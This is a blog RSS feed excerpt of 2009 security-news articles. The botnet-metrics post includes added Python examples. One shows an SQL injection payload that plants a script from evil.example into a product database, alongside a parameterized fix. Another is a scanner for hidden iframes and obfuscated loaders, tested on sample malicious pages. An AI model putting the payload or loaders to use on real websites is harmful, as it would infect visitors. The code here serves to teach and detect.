<p>Much could be riding on the resolution. Will Western values factor in or will China&#8217;s tactics prevail? &#8220;The 21st century is about whether and where a converging balance will be found. Google is just the beginning,&#8221; says international lawyer Jeanne-Marie Gescher.</p>
<p><em>MacLeod reported from Beijing, Chu from Hong Kong and Acohido from Seattle. Contributing: Jon Swartz in San Francisco</em></p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://lastwatchdog.com/google-vs-china-timeline-search-giant-communist/" rel="bookmark">Google vs. China timeline: can search giant thwart communist superpower?</a></li><li><a href="http://lastwatchdog.com/pros-report-83-big-organizations-breached/" rel="bookmark">IT pros: most senior execs are ignorant about cyberattacks</a></li><li><a href="http://lastwatchdog.com/chinas-cyberspies-arent-prowling-internet/" rel="bookmark">China's cyberspies aren't the only ones prowling Internet</a></li><li><a href="http://lastwatchdog.com/china-noteworthy-steps-improve-cybersecurity/" rel="bookmark">China taking noteworthy steps to improve cybersecurity</a></li><li><a href="http://lastwatchdog.com/google-faces-profound-liability-concerns-gaia-password/" rel="bookmark">Google faces profound liability concerns over Gaia password breach</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/google-china-affair-shows-china-oes-business/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Finally &#8212; a solid measurement of the scale and scope of cyber attacks</title>
		<link>http://lastwatchdog.com/finally-solid-measurement-scale-scope-cyber-attacks/</link>
		<comments>http://lastwatchdog.com/finally-solid-measurement-scale-scope-cyber-attacks/#comments</comments>
		<pubDate>Wed, 16 Sep 2009 21:30:43 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[For consumers]]></category>
		<category><![CDATA[For technologists]]></category>
		<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[Obama watch]]></category>
		<category><![CDATA[Steps forward]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=2784</guid>
		<description><![CDATA[Metrics precisely quantifying the scale and scope of cybercrime activity have historically been hard to pin down. But now comes a milestone survey, buttressed by another report, that defines the degree to which the Web is infested with malicious code.
The SANS Institute&#8217;s report on Top Cyber Risks is by far the most comprehensive accounting of [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2791" title="katrina3" src="http://lastwatchdog.com/wp/wp-content/uploads/katrina3.jpg" alt="katrina3" width="200" height="125" />Metrics precisely quantifying the scale and scope of cybercrime activity have historically been hard to pin down. But now comes a milestone survey, buttressed by another report, that defines the degree to which the Web is infested with malicious code.</p>
<p>The SANS Institute&#8217;s report on <a href="http://www.sans.org/top-cyber-security-risks">Top Cyber Risks</a> is by far the most comprehensive accounting of ongoing cyber attacks ever made public. SANS is the well-respected Washington D.C.-based tech security think tank and training center. The organization distilled attack data from 6,000 companies and government agencies protected by defense systems supplied by two leading tech security companies, <a href="http://www.tippingpoint.com/">TippingPoint</a> and <a href="http://www.qualys.com/index.php">Qualys.</a></p>
<p>SANS&#8217; cornerstone finding: the vast bulk of attacks to infect home and workplace computers, enlist them into bot networks, and then use them to carry out criminal activities spin off two pervasive weaknesses.</p>
<p>The first: unpatched vulnerabilities in popular consumer applications,  <a href="http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/">especially Adobe&#8217;s Acrobat Reader and Flash Player</a>,  Apple QuickTime and Microsoft Office. The second: security weaknesses  in the Web applications that enable  all the cool features on Web 2.0 sites.</p>
<p><strong>Hand in glove</strong></p>
<p>These two weaknesses work hand-in-glove &#8212; to the benefit of the bad guys. Here&#8217;s how:</p>
<p>Many cyberattacks hinge on getting a victim to click on a corrupted URL, as I explained in my <a href="http://www.usatoday.com/tech/news/2009-09-02-bad-links-hackers-stars-internet_N.htm">03Sept2009 USA Today news story.</a></p>
<p>Of course, the bad URL had to be tainted at some point earlier. Attackers most often do this via <a href="http://lastwatchdog.com/faq-sql-injection-attacks/">SQL injection exploits</a> of legit Web pages; these automated attacks seek out Web sites running poorly-written Web applications and rewrite the stored content those sites build their pages from, so that every page rendered from the database carries the attacker&#8217;s script.</p>
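<p>The following is an added example, not code from the original article or from any of the vendors it quotes. It shows the tainting step in miniature: a hit counter that pastes a query-string value into SQL, the stacked statement an attacker appends to it, and the same counter with a bound parameter. The catalog rows, the hit-counter functions and the host evil.example are all constructed for the demo; executescript() is used to stand in for server-side drivers that accept several statements in one request.</p>

```python
import sqlite3

# Constructed sample catalog for a small shop page; not data from the article.
SEED_ROWS = [
    (1, "PDF viewer plug-in", "Free download, works in any browser"),
    (2, "Media player add-on", "Plays video and Flash content"),
]

# Hypothetical attacker host and loader script; both names are assumptions.
INJECTED_TAG = '<script src="http://evil.example/ld.js"></script>'

# The attacker-supplied "product id": a legitimate value, then a second
# statement that appends the script tag to every description in the table.
PAYLOAD = (
    "1; UPDATE products SET description = description || '" + INJECTED_TAG + "'"
)


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE products (id INTEGER, name TEXT, description TEXT, "
        "views INTEGER DEFAULT 0)"
    )
    con.executemany(
        "INSERT INTO products (id, name, description) VALUES (?, ?, ?)", SEED_ROWS
    )
    con.commit()
    return con


def record_view_vulnerable(con, product_id):
    """Hit counter that pastes the query-string value straight into SQL.

    executescript() runs every statement in the string, which stands in for
    server-side drivers that accept stacked queries; the attacker's second
    statement runs with the application's own database rights."""
    con.executescript(
        "UPDATE products SET views = views + 1 WHERE id = " + product_id
    )


def record_view_hardened(con, product_id):
    """Same counter with a bound parameter. The whole payload is treated as
    one opaque value that matches no integer id, so nothing is rewritten.
    Returns the number of rows updated (1 for a real id, 0 for the payload)."""
    cur = con.execute(
        "UPDATE products SET views = views + 1 WHERE id = ?", (product_id,)
    )
    con.commit()
    return cur.rowcount


def product_html(con, product_id):
    """Renders the catalog row the way a template would; whatever is now in
    the description column is served to every visitor as markup."""
    name, description = con.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return "<h1>%s</h1><p>%s</p>" % (name, description)


def poisoned_row_count(con):
    """How many catalog rows now carry an injected script tag."""
    return con.execute(
        "SELECT count(*) FROM products WHERE description LIKE '%<script%'"
    ).fetchone()[0]


def demo(hardened):
    """Drive the attacker's request through one of the two handlers and
    return (rows carrying the injected tag, rendered page for product 1)."""
    con = make_db()
    if hardened:
        record_view_hardened(con, PAYLOAD)
    else:
        record_view_vulnerable(con, PAYLOAD)
    return poisoned_row_count(con), product_html(con, 1)


if __name__ == "__main__":
    for mode in (False, True):
        bad, html = demo(hardened=mode)
        print("hardened=%s poisoned rows=%d" % (mode, bad))
        print(html)
```

Run stand-alone, the vulnerable path reports two poisoned rows and a product page that now loads the attacker's script; the parameterized path reports none and updates nothing, because the driver never parses the payload as SQL.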
<p><img class="alignleft size-full wp-image-2798" title="roger-thornton_crop09px" src="http://lastwatchdog.com/wp/wp-content/uploads/roger-thornton_crop09px.jpg" alt="roger-thornton_crop09px" width="90" height="126" />&#8220;Organizations need to pay more attention to the security of their critical software applications,&#8221; says Roger Thornton, co-founder and CTO of Fortify Software. &#8220;Today&#8217;s cybercriminals have  moved  to the easiest breach points, which is now the applications an organization uses to conduct its business.&#8221;</p>
<p>Upon cracking a Web page, the hacker will typically use off-the-shelf, tried-and-true tools, such as <a href="http://www.securityfocus.com/brief/529">Mpack </a>or <a href="http://www.ditii.com/2007/09/12/icepack-hacker-exploit-tool-kit-update-released-with-first-zero-day-attack-code/">IcePack</a>, for the next step. These tools will efficiently seek out security holes  in  popular PC applications &#8212;  the everyday programs that can be found on just about any PC, including  Internet Explorer, Acrobat Reader, Flash Player, Microsoft Office.</p>
<p><strong>A bot is born</strong></p>
<p>Mpack and IcePack and other similar exploit kits, planted on the compromised page, go to work on the PCs of everyone who visits it. They quickly run through an extensive list of known vulnerabilities for all popular consumer apps &#8212; and exploit the first unpatched vulnerability they find. The exploit almost always begins with the installation of a tiny wormhole, called a <a href="http://www.f-secure.com/v-descs/trojdown.shtml">&#8220;Trojan downloader,&#8221;</a> that fetches further malware and secures ongoing access to the hard drive.</p>
<p>The attacker next uses this wormhole to install a botnet management program that turns the computer into an obedient &#8220;bot,&#8221; reporting to a command-and-control server operated by the &#8220;botmaster.&#8221; The top botmasters run mega botnets  tens of thousands, or even  hundreds of thousands of bots strong, with names like Waledac, Pushdo, Cutwail, Rustock, Mega-D and Storm.</p>
<p>Each freshly infected bot instantly  begins to participate in myriad criminal activities &#8211; everything from<a href="http://www.usatoday.com/tech/news/computersecurity/2008-03-16-computer-botnets_N.htm"> spreading spam</a> to triggering <a href="http://lastwatchdog.com/scareware-attacks-spreading-twitter-google-legit/">scareware promotions</a> to <a href="http://lastwatchdog.com/banking-trojans-infest-internet/">hijacking online banking accounts</a> to participating in <a href="http://lastwatchdog.com/perpetrators-korean-cyber-attacks-stalking-horse/">politically-motivated Distributed Denial-of-Service </a>attacks.</p>
<p>Top botmasters make use of infected machines judiciously &#8212; they&#8217;ll pay attention to time zones and use machines during early morning hours when the owner is asleep, for instance. They will also put bots to sleep for a time and use them again later, like letting farmland go fallow. This is to keep control of the bot for an extended period. For obvious reasons, fresh bots are always in high demand.</p>
<p><img class="alignleft size-full wp-image-2797" title="alanpaller_crop" src="http://lastwatchdog.com/wp/wp-content/uploads/alanpaller_crop.jpg" alt="alanpaller_crop" width="90" height="121" />&#8220;The vast bulk of new bots are created when unsuspecting users visit trusted Web sites that are also infected,&#8221; says Alan Paller, SANS research director. &#8220;Web attacks take advantage of client-side vulnerabilities that are being given insufficient attention by cyber defenders. The web attacks also take advantage of Web programming errors that are not being picked up by common vulnerability scanners.&#8221;</p>
<p>The bottom line, says Paller, is that &#8220;two cyber risks dwarf all others and users are not effectively mitigating them.&#8221;</p>
<p><strong>Web threats mushroom</strong></p>
<p>Serendipitously, SANS released the results of its milestone survey the same day Websense released its <a href="http://community.websense.com/blogs/websense-features/archive/2009/09/15/websense-security-labs-report-state-of-internet-security-q1-q2-2009.aspx">semiannual threat report</a> covering the first half of 2009. Websense keeps track of Web-based attacks hitting the networks of its corporate customers; it reported a whopping 671 percent spike in malicious Web links in the first half of 2009 compared to the first half of 2008.</p>
<p>What&#8217;s worse: corrupted legitimate sites account for an estimated 77 percent of the bad links lurking in the Internet wild.</p>
<p>Web properties that encourage user-generated content &#8212; such as media sites, social networks and popular blogs &#8212; have become popular targets. This was vividly demonstrated just last weekend when hackers served up viral advertisements all across <a href="http://www.mxlogic.com/securitynews/web-security/new-york-times-rogue-ad-shows-perils-of-website-security611.cfm">the  New York Times&#8217; Web site.</a></p>
<p><img class="alignleft size-full wp-image-2809" title="roxio_corruptedad" src="http://lastwatchdog.com/wp/wp-content/uploads/roxio_corruptedad.png" alt="roxio_corruptedad" width="300" height="250" />In a <a href="http://blog.purewire.com/bid/14157/USAToday-com-Ads-Redirect-to-Rogue-AV">similar attack  on USA Today&#8217;s Web site </a>last May, cyber criminals  patronized a legit  ad placement agency to  purchase advertising space on USA Today&#8217;s  Life  home page. The crooks then supplied the ad agency with copies of ads for Roxio Creator 2009 and Phoenix University. Then once every hour or so, the crooks sent through an ad containing  a bit of malicious code, as shown below. This bad code   redirected the visitor&#8217;s PC  to an insistent promotion to buy  worthless  antivirus protection.</p>
<p><img class="alignleft size-full wp-image-2811" title="roxio_ad_badcode_crop450px" src="http://lastwatchdog.com/wp/wp-content/uploads/roxio_ad_badcode_crop450px.jpg" alt="roxio_ad_badcode_crop450px" width="450" height="82" />&#8220;Neither clicking, nor hovering over the ad was required to activate the malicious code,&#8221; says Purewire researcher Paul Royal, who discovered the USA Today attack. &#8220;In addition,  the (corrupted) ad could have been, and likely was, served almost anywhere on USA Today&#8217;s website.&#8221;</p>
<p>Anyone who happened to visit USA Today&#8217;s Life home page at the moment the corrupted Roxio ad appeared was infected. Yet, had an  investigator checked shortly thereafter, the crooks&#8217; ad would have been found to be clean of any bad code, says<a href="http://thompson.blog.avg.com/"> Roger Thompson,</a> senior researcher at AVG. This technique of paying an ad network to post  a string of harmless, innocuous ads &#8212;  sporadically replaced by a corrupted ad &#8212; has been used widely for at least two years, Thompson says.</p>
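<p>Both attacks above leave the same kind of footprint in the served HTML: a catalog field rewritten by SQL injection ends up as a script loaded from a host the site never uses, and a rotated malicious creative is typically a zero-sized or hidden iframe, or an inline script that unescapes one at runtime. The scanner below is an added example (not a tool from the article, from Purewire or from AVG) that flags those three patterns in one fetched page given the site's own host and an allowlist of its legitimate third parties. The sample pages and the hosts shop.example, news.example, ads.example and evil.example are constructed for the demo. Because a rotated ad is served only occasionally, this check is meant to be run on every fetch of a monitored page, not once.</p>

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Flags three footprints: a script loaded from a host the page has no
    business talking to, an iframe sized or styled to be invisible, and an
    inline script that unescapes a hidden iframe at runtime. Hosts in
    `trusted_hosts` (the site itself, its CDN, its ad server) are exempt;
    everything else off-site is reported."""

    def __init__(self, page_host, trusted_hosts=()):
        super().__init__()
        self.trusted = {page_host, *trusted_hosts}
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            if self._hidden(a):
                self.findings.append(("hidden-iframe", a.get("src", "")))
            elif self._offsite(a.get("src")):
                self.findings.append(("offsite-iframe", a["src"]))
        elif tag == "script":
            if a.get("src"):
                if self._offsite(a["src"]):
                    self.findings.append(("offsite-script", a["src"]))
            else:
                self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        # Heuristic: document.write(unescape("%3Ciframe ...")) was the usual
        # way a rotated creative spliced in a loader without a visible tag.
        if self._in_inline_script:
            text = data.lower()
            if "unescape(" in text and "%3ciframe" in text:
                self.findings.append(("obfuscated-inline-script", data.strip()[:60]))

    def _hidden(self, a):
        style = a.get("style", "").replace(" ", "").lower()
        return (
            a.get("width") in ("0", "1")
            or a.get("height") in ("0", "1")
            or "display:none" in style
            or "visibility:hidden" in style
        )

    def _offsite(self, url):
        host = urlparse(url or "").hostname
        return bool(host) and host not in self.trusted


def scan(html, page_host, trusted_hosts=()):
    """Return the list of (kind, detail) findings for one fetched page."""
    parser = InjectionScanner(page_host, trusted_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed samples; not captures from the incidents the article describes.
CLEAN_PAGE = (
    '<html><head><script src="/js/site.js"></script></head>'
    '<body><p>Hello</p><iframe src="http://shop.example/player"></iframe></body></html>'
)
# A catalog description rewritten by SQL injection, rendered into the page.
POISONED_PRODUCT_PAGE = (
    '<html><body><h1>PDF viewer plug-in</h1><p>Free download'
    '<script src="http://evil.example/ld.js"></script></p></body></html>'
)
# The one-in-a-series rotated creative: the ad server is trusted, the
# creative's own payload is not.
ROTATED_AD_CREATIVE = (
    '<div><script src="http://ads.example/serve.js"></script>'
    '<iframe src="http://evil.example/in.cgi?3" width="0" height="0" '
    'style="display: none"></iframe>'
    '<script>document.write(unescape("%3Ciframe src=%22http://evil.example/'
    'av.php%22 width=0 height=0%3E%3C/iframe%3E"));</script></div>'
)

if __name__ == "__main__":
    print("clean:", scan(CLEAN_PAGE, "shop.example"))
    print("poisoned:", scan(POISONED_PRODUCT_PAGE, "shop.example"))
    print("creative:", scan(ROTATED_AD_CREATIVE, "news.example", {"ads.example"}))
```

The allowlist is the important design choice: a page that legitimately pulls from an ad network will always have off-site scripts, so the scanner reports only hosts the operator has not vouched for, and the hidden-iframe and unescape heuristics catch the payload even when the creative arrives through a trusted ad server.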
<p>So far this year, community-driven security tools, like those used on YouTube and BlogSpot, are proving to be &#8220;65% to 75% ineffective&#8221; at protecting users, says Websense CTO Dan Hubbard.</p>
<p>&#8220;The last six months have shown that malicious hackers and fraudsters go where the people are on the Web,&#8221;  he says.  &#8220;From <a href="http://lastwatchdog.com/twitter-google-filter-block-bad-urls/">malicious Twitter spam </a>campaigns and blog comment spam to the massive SQL injection attacks,  those perpetrating fraud are exploiting the inherent trust users have of known Web properties and other users.&#8221;</p>
<p><em>Web threats graphic courtesy of Trend Micro</em></p>
<p><em>&#8211;By Byron Acohido</em></p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://lastwatchdog.com/gamers-corrupt-websites-zero-day-attack-microsoft/" rel="bookmark">Gamers corrupt websites in zero-day attack, as Microsoft works on a patch</a></li><li><a href="http://lastwatchdog.com/proliferation-scareware-fuels-cybercrime/" rel="bookmark">How the proliferation of 'scareware' fuels cybercrime</a></li><li><a href="http://lastwatchdog.com/selling-fake-antivirus-start/" rel="bookmark">How the selling of fake antivirus got its start</a></li><li><a href="http://lastwatchdog.com/data-thieves-continue-target-gamer-logons/" rel="bookmark">Data thieves continue to target MMORPG gamer accounts</a></li><li><a href="http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/" rel="bookmark">Adobe surpasses Microsoft as favorite hacker's target</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/finally-solid-measurement-scale-scope-cyber-attacks/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Melissa Hathaway steps down from consideration to be U.S. cyber czar</title>
		<link>http://lastwatchdog.com/melissa-hathaway-steps-consideration-us-cyber-czar/</link>
		<comments>http://lastwatchdog.com/melissa-hathaway-steps-consideration-us-cyber-czar/#comments</comments>
		<pubDate>Tue, 04 Aug 2009 20:19:55 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[Obama watch]]></category>
		<category><![CDATA[Steps forward]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=2448</guid>
		<description><![CDATA[For Melissa Hathaway, the Mission, in the end, did prove to be Impossible.
Hathaway was widely hailed for completing a 60-day review of U.S. cybersecurity policy, setting up President Obama&#8217;s milestone May 29th speech, in which he became the first head of state to articulate the necessity for explicit national  policies to make the Internet safer.
After [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-2453" title="melissahathaway" src="http://lastwatchdog.com/wp/wp-content/uploads/melissahathaway-150x150.jpg" alt="melissahathaway" width="150" height="150" />For Melissa Hathaway, the Mission, in the end, did prove to be Impossible.</p>
<p>Hathaway was <a href="http://lastwatchdog.com/melissa-hathaway-tackles-cybersecurity-mission-impossible/">widely hailed</a> for completing a 60-day review of U.S. cybersecurity policy, setting up President Obama&#8217;s milestone <a href="http://lastwatchdog.com/obama-inserts-white-house-leadership-role-secure-internet/">May 29th speech</a>, in which he became the first head of state to articulate the necessity for explicit national  policies to make the Internet safer.</p>
<p>After her appearance last April as a keynote speaker at the RSA 2009 security conference in San Francisco, in which she spoofed her task in a Mission Impossible skit, some considered Hathaway a  front runner to be named Obama&#8217;s cybersecurity adviser.</p>
<p>But yesterday she <a href="http://fcw.com/articles/2009/08/03/web-hathaway-to-resign.aspx">removed herself</a> from consideration. The move could shake things up and pave the way for the selection of a so-called cybersecurity czar from a short list of finalists, which Obama has been mulling for some eight weeks now.</p>
<p>&#8220;She is, as always, a gracious leader,&#8221; Alan Paller, research director at The SANS Institute, says of Hathaway. &#8220;When she learned she was not to be the choice, the best thing she could do to raise the priority of selecting the new person was to leave.&#8221;</p>
<p><strong>White House weighs in</strong></p>
<p>A White House statement notes that Hathaway had been on temporary detail to the National Security Staff from the Office of the Director of National Intelligence. Her initial assignment was up on  April 9th and  her second detail officially ends  August 9th.</p>
<p>&#8220;We are grateful for her dedicated service and for the significant progress she and her team have made on our national cyber security strategy,&#8221; says White House spokesman Nick Shapiro. &#8220;Cyber security is a major priority for the President.&#8221;</p>
<p>Shapiro reiterated the key takeaway from Obama&#8217;s historic speech: that a selection process was underway to fill the newly created post of &#8220;White House cyber security coordinator.&#8221; He also noted that the appointee &#8220;will have direct access to the President,&#8221; and that the administration &#8220;is pursuing a new comprehensive approach to securing America&#8217;s digital infrastructure.&#8221;</p>
<p>&#8220;The President is personally committed to finding the right person for this job,&#8221; says Shapiro. &#8220;A rigorous selection process is well underway.&#8221;</p>
<p><strong>Lack of empowerment</strong></p>
<p>Hathaway <a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/08/03/AR2009080302697.html">told Washington Post</a> reporter Ellen Nakashima that she wasn&#8217;t empowered to &#8220;drive the change&#8221; called for in her review and punctuated by Obama&#8217;s historic speech. The central notion &#8212; that White House leadership is necessary to stem rising cyber threats &#8212; was hammered out in two years&#8217; worth of consensus building among business and military leaders, lawmakers and regulators, and the intelligence community.</p>
<p>The Center for Strategic and International Studies last December presented Obama with this <a href="http://csis.org/component/option,com_csis_pubs/task,view/id,5157/">stack of recommendations.</a> The document has been downloaded more than 30,000 times. And supporting proof points came in <a href="http://www.gao.gov/new.items/d081157t.pdf">this report</a> by the Government Accountability Office.</p>
<p>&#8220;I&#8217;ve concluded that I can do more now from a different role,&#8221; Hathaway told Nakashima.</p>
<p><strong>More questions than answers</strong></p>
<p>The devil, as always,  is in the details. Two sweltering  months of summer have elapsed with the White House still debating who should take the hot seat, and how much of the president&#8217;s ear that person will have.</p>
<p><img class="alignleft size-full wp-image-2455" title="todd_mcclelland_crop" src="http://lastwatchdog.com/wp/wp-content/uploads/todd_mcclelland_crop.jpg" alt="todd_mcclelland_crop" width="90" height="128" />&#8220;At present, there are more questions than answers regarding the new position.  What will he or she really do? &#8221; remarks Todd McClelland, partner at the influential Washington D.C. law firm, Alston &amp; Bird. He said the  legal community is calling for the czar &#8220;to establish clarity regarding security and privacy rules and regulations.&#8221;</p>
<p>Daniel Ives, an analyst at FBR Capital Markets, says there is no indication that Obama is close to naming anyone to the post.</p>
<p>&#8220;We fully expect more speed bumps,&#8221; says Ives. &#8220;This cybersecurity initiative is a massive, multi-decade task that will be very onerous, complex, and touch agencies across the entire government as the US undergoes a major facelift on its security infrastructure.&#8221;</p>
<p><em>Photo caption:  Hathaway at Moscone Center, San Francisco, April 2009,  delivering &#8216;Mission Impossible&#8217;  keynote speech at RSA security conference. photo by Byron Acohido<br />
</em></p>
<p><em>&#8211;By Byron Acohido</em></p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://lastwatchdog.com/us-cybersecurity-review-hearing-scheduled-march-10/" rel="bookmark">U.S cybersecurity review 30-day update: hearing scheduled March 10</a></li><li><a href="http://lastwatchdog.com/melissa-hathaway-tackles-cybersecurity-mission-impossible/" rel="bookmark">Melissa Hathaway tackles cybersecurity Mission Impossible</a></li><li><a href="http://lastwatchdog.com/views-pres-obamas-delayed-selection-cybersecurity/" rel="bookmark">Three views on Pres. Obama's delayed selection of cybersecurity czar</a></li><li><a href="http://lastwatchdog.com/pressure-mounts-naming-white-house-cybersecurity-adviser/" rel="bookmark">Pressure mounts for naming of a White House cybersecurity adviser with clout</a></li><li><a href="http://lastwatchdog.com/white-house-cyber-security-post-remains-unfilled/" rel="bookmark">White House cyber security adviser post remains unfilled</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/melissa-hathaway-steps-consideration-us-cyber-czar/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Insider intrusions escalate using very simple attacks methods</title>
		<link>http://lastwatchdog.com/insider-intrusions-escalate-simple-attacks-methods/</link>
		<comments>http://lastwatchdog.com/insider-intrusions-escalate-simple-attacks-methods/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 23:29:35 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[For consumers]]></category>
		<category><![CDATA[For technologists]]></category>
		<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=2434</guid>
		<description><![CDATA[
USA TODAY
See initial version here.
By Byron Acohido, USA TODAY
Marla Suttenberg had a sinking feeling that a corporate spy was shadowing her.
In March 2008, the owner of Woodcliff Lake, N.J.-based Sapphire Marketing was preparing to give a longtime client a generous price cut on $134,000 worth of audio/videoconferencing equipment.
But before her sales rep could extend the [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2435" title="090729_michaeljackson_crop1" src="http://lastwatchdog.com/wp/wp-content/uploads/090729_michaeljackson_crop1.jpg" alt="090729_michaeljackson_crop1" width="425" height="629" /></p>
<p>USA TODAY</p>
<p><em>See initial version <a href="http://www.usatoday.com/tech/news/computersecurity/2009-07-28-corporate-espionage-recession-tech_N.htm">here.</a></em></p>
<p>By Byron Acohido, USA TODAY<br />
Marla Suttenberg had a sinking feeling that a corporate spy was shadowing her.</p>
<p>In March 2008, the owner of Woodcliff Lake, N.J.-based Sapphire Marketing was preparing to give a longtime client a generous price cut on $134,000 worth of audio/videoconferencing equipment.</p>
<p>But before her sales rep could extend the offer, her chief rival, David Goldenberg, then regional vice president of sales for AMX, a Dallas-based conferencing systems maker, sent the client an e-mail disparaging Sapphire and offering a steeper AMX discount.</p>
<p>&#8220;I felt sick to my stomach,&#8221; Suttenberg recalls. To pull that off, someone had to have infiltrated Sapphire&#8217;s internal e-mail, she thought at the time.</p>
<p>She was right. A few days later, Goldenberg, 48, of Oceanside, N.Y., was arrested. He subsequently pleaded guilty to felony wiretapping for tampering with Sapphire&#8217;s e-mail. He was sentenced last month to three months probation and ordered to undergo counseling. &#8220;There was nothing sophisticated about me getting into their e-mail,&#8221; he said in an interview. &#8220;Honestly, I had no idea that it was illegal.&#8221;</p>
<p>Corporate espionage using very simple tactics &#8211; much of it carried out by trusted insiders, familiar business acquaintances, even janitors &#8211; is surging. That&#8217;s because businesses large and small are collecting and storing more data than ever before. What&#8217;s more, companies are blithely allowing broad access to this data via nifty Internet services and cool digital devices.</p>
<p>&#8220;Having more sensitive information being seen by more people and accessed on more devices drives up risk significantly,&#8221; says Kurt Johnson, vice president at Courion, a supplier of identity management systems.</p>
<p>The slumping economy doesn&#8217;t help. &#8220;Mass layoffs have increased internal threat levels dramatically,&#8221; says Grant Evans, CEO of ActivIdentity, which makes smart cards and security tokens.</p>
<p>Employees worried about job security face rising temptations to seek out and hoard proprietary data that could help boost their job performance, or at least make them more marketable should they get laid off, says Adam Bosnian, vice president at Cyber-Ark Software, another identity management systems supplier.</p>
<p>Of the 400 information technology pros who participated in a recent Cyber-Ark survey, 74% said they knew how to circumvent security to access sensitive data, and 35% admitted doing so without permission. Among the most commonly targeted items: customer databases, e-mail controls and CEO passwords.</p>
<p>Cellphones, digital cameras and USB dongles come with vast memory &#8211; enough to store data that a few years ago might have required a stack of CDs, says Nick Newman, computer crimes specialist at the non-profit National White Collar Crime Center. Web services, such as Hotmail, Yahoo Mail and Gmail, and popular social networks, such as Facebook and Twitter, make terrific free tools for transferring and storing pilfered data anonymously.</p>
<p>&#8220;If you create an environment where your employees can walk freely out the door with unencrypted, proprietary data, it&#8217;s only a matter of time before someone actually does it,&#8221; says Sam Masiello, vice president at messaging and browser security firm MX Logic.</p>
<p>Lax passwords a danger</p>
<p>The exposure redoubles at companies that are lax about passwords. Last week, a hacker pilfered sensitive Twitter business documents and released them publicly. Twitter co-founder Biz Stone said in a statement that the hacker got in by figuring out the log-on of a Twitter employee who used the same non-unique password for several online accounts.</p>
<p>&#8220;The unauthorized extraction of information is epidemic and essentially unstoppable,&#8221; says Phil Lieberman, CEO of Lieberman Software, which makes password security systems.</p>
<p>Goldenberg&#8217;s caper illustrates just how easy it can be. In an interview, he said it all began in September 2007 when one of the sales reps who reported to him at AMX jumped ship to rival Sapphire, the sales arm of Crestron Electronics, a Rockleigh, N.J.-based maker of conferencing systems. Goldenberg says he inspected the company laptop turned in by the departing rep and found an e-mail from Sapphire welcoming the new recruit.</p>
<p>The message, he says, included the Web address to Sapphire&#8217;s e-mail server and the recruit&#8217;s new e-mail address and password. Goldenberg says he logged on as the recruit and quickly figured out the log-ons of three other employees. Like the recruit, they used their first name as part of their e-mail address &#8211; and as their password.</p>
<p>&#8220;He didn&#8217;t go searching for this,&#8221; says Dean Schneider, Goldenberg&#8217;s attorney. &#8220;It basically hit him in the face.&#8221;</p>
<p>For each e-mail account, Goldenberg activated a feature to forward copies of all incoming messages to a fresh Gmail account he created. He then spent long hours and days on end poring over Sapphire e-mail, says Bergen County prosecutor Brian Lynch. &#8220;It was voyeuristic,&#8221; says Lynch. &#8220;That&#8217;s why we recommended counseling.&#8221;</p>
<p>Court records show Goldenberg may have initially gained access to Sapphire&#8217;s e-mail months earlier than he claims.</p>
<p>&#8220;Admittedly some of our people&#8217;s passwords probably were not as strong as they should have been,&#8221; Suttenberg says. &#8220;But just because you have a cheap lock doesn&#8217;t mean it&#8217;s legal to pick the lock.&#8221;</p>
<p>The customer whom Goldenberg tried to steal contacted Sapphire to inquire how Goldenberg knew specifics about Sapphire&#8217;s discount before he did. Suttenberg talked the customer into sticking with Sapphire.</p>
<p>&#8220;He was too blatant,&#8221; she says of Goldenberg.</p>
<p>A new system</p>
<p>Suttenberg has since scrapped the bare-bones e-mail service supplied by her local Internet service provider, which cost her a few hundred dollars a month. She now pays thousands of dollars a month for an in-house Microsoft Exchange e-mail server brimming with security features. She also instructed her 10 employees to change their e-mail account passwords frequently and to avoid passwords &#8220;that your co-workers and contacts can figure out.&#8221;</p>
<p>While Suttenberg has buttoned up Sapphire, millions of small-business owners &#8211; and plenty of big corporations &#8211; continue to make it easy for larcenous insiders. With the exception of highly regulated banking and health care companies, most businesses are just beginning to discuss how to repel insider intrusions, security experts say.</p>
